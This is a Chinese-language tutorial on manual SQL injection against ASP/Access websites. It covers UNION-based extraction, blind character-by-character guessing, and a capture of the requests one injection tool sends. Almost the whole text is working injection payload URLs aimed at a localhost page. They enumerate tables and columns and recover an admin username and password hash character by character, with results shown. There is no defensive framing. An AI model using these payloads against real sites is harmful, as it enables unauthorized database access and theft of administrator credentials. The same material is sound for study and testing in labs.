WEB安全 asp+access注入
asp+access注入 数据库 (access数据库没有数据库名) 表名 字段(列名) 记录(行,内容) 注入常用函数: top n 表示查询结果的第n个记录 len() 函数返回文本字段中值的长度 mid(column_name,start[,length])函数用于从文本字段中提取指定长度的字符 asc() 返回指定文本字符的ASCII码 ORDER BY 语句用于根据指定的列对结果集进行排序。默认按照升序对记录进行排序,降序使用 DESC 关键字。order by admin DESC 一、asp+access 手工注入联合查询法 http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and 1=1 http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and 1=2 http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 order by 22 http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 order by 23 http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select * from admin) http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT 1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin admin a48e190fafc257d3 //and 1=2 UNION ALL SELECT 1,2,3,..... form admin 这种方法也用于先报错再获取可显示位 http 二、asp+access 手工逐字猜解法 http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select * from admin) http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 len(admin) from admin)=5 //admin http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(admin,1,1)) from admin)=97 (a) http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(admin,2,1)) from admin)=100 (d) http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(admin,3,1)) from admin)=109 (m) http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(admin,4,1)) from admin)=105 (i) http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(admin,5,1)) from admin)=110 (n) http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 len(password) from admin)=16 //a48e190fafc257d3 http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,1,1)) from admin)=97 (a) http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,2,1)) from admin)=52 (4) http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,3,1)) from admin)=56 (8) http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,4,1)) from admin)=101 (e) http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,5,1)) from admin)=49 (1) http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,6,1)) from admin)=57 (9) http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,7,1)) from admin)=48 (0) http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,8,1)) from admin)=102 (f) http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,9,1)) from admin)=97 (a) http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,10,1)) from admin)=102 (f) http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,11,1)) from admin)=99 (c) http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,12,1)) from admin)=50 (2) http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,13,1)) from admin)=53 (5) http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,14,1)) from admin)=55 (7) http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,15,1)) from admin)=100 (d) http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,16,1)) from admin)=51 (3) 三、明小子注入工具抓包分析 asp+access逐字猜解法 抓包工具:SRSniffer,WSockExpert 1.检测是否是注入点: http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and 1=1 http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and 1=2 http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select * from sysobjects) 2.猜是否存在指定表名: http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select * from admin) http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select * from user) http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select * from menbers) 3.猜指定表是否存在指定列名(也叫字段): http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select username from admin) http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select admin from admin) http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select password from admin) 3.猜admin表第一个字段有几行记录(2行记录表示两个用户): http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 And (Select Count(1) From [admin] Where 1=1)<=2 http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 And (Select Count(1) From [admin] Where 1=1)=1 http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 And (Select Count(1) From [admin] Where 1=1)=2 4.猜第一行记录长度://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 And (Select Top 1 len(cstr([admin])) From (Select Top 1 * From [admin] Where 1=1 Order by [admin]) T Order by [admin] desc)<=2 http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 And (Select Top 1 len(cstr([admin])) From (Select Top 1 * From [admin] Where 1=1 Order by [admin]) T Order by [admin] desc)<=4 http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 And (Select Top 1 len(cstr([admin])) From (Select Top 1 * From [admin] Where 1=1 Order by [admin]) T Order by [admin] desc)<=6 http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 And (Select Top 1 len(cstr([admin])) From (Select Top 1 * From [admin] Where 1=1 Order by [admin]) T Order by [admin] desc)=5 5.猜解第一个用户admin字段一位字符,对比ASCII值: http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select top 1 admin from admin where instr(admin,'admin')=1 and len(username)=5) http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),1,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 30 and 130 http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),1,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 97 and 97 http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),2,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 30 and 130 http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),2,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 100 and 100 http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),3,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 30 and 130 http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),3,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 109 and 109 http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),4,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 30 and 130 http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),4,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 105 and 105 http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),5,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 30 and 130 http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),5,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 110 and 110 6.猜解password字段长度、每一位字符: http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 And (Select Top 1 len(cstr([password])) From (Select Top 1 * From [admin] Where 1=1 Order by [password]) T Order by [password] desc)=16 http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),1,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 97 and 97 http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),2,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 52 and 52 http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),3,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 56 and 56 http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),4,1)) from (Select Top 2 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 101 and 101 http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),5,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 49 and 49 http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),6,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 57 and 57 http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),7,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 48 and 48 http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),8,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 102 and 102 http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),9,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 97 and 97 http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),10,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 102 and 102 http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),11,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 99 and 99 http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),12,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 50 and 50 http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),13,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 53 and 53 http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),14,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 55 and 55 http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),15,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 100 and 100 http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),16,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 51 and 51
附: